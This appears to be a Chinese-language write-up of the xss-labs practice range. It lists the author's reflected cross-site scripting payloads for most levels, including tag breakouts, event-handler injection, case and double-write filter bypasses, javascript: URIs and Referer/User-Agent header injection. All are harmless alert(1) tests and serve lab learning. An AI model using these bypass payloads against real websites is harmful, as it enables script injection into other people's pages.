在开始前,先了解一下前段小知识
javascript事件(onclick/onmouseover/onmouseout等)
楼主自己用的payload
level1 <script>alert(1)</script>
level2"><script>alert(1)</script>//
level3' onclick=alert(1)//
level4" onclick=alert(1) //
level5"> <a href=javascript:alert()>something</a>
level6"><sCRIPT>alert(1)</sCRIPT>//
level7"><scscriptript>alert(1)</scrscriptipt>
level8
javascript:alert(1)
解码结果是:javascript:alert(1)
level9
javascript:alert(1)//http://
码结果是:javascript:alert(1)//http://
level10
主要是t_sort传参
所以?t_sort=" type="text" onclick=alert(1)//
和?keyword=123&t_sort=" type="text" onclick=alert(1)//
都是一样的
level11" onclick="alert(1)" type="text"//
抓包把Referer的值改了
如果没有Referer,就自己添加上。
这次是抓包改User-Agent
level12" onclick="alert(1)" type="text"//
这次是抓包改User-Agent
level13
user=" onmouseover=alert() type="text"//
彳亍
user=" οnclick=“alert(1)” type=“text”// 不彳亍
14、15关楼主打不开,就省略把
level16?keyword=<img%0Asrc=1%0Aonerror=alert(1)>
level17?arg01=a&arg02= onmouseover=alert(1)
level18
漏洞描述:等同于17,arg01和arg02存在注入点,但web服务器对"进行了过滤
level19-20
漏洞描述:flash 反编译,输入的onmouseover事件会被当作普通文本
原理+payload:xss_labs 漏洞平台靶场练习 总结 wp
原理+payload2:XSS靶场练习题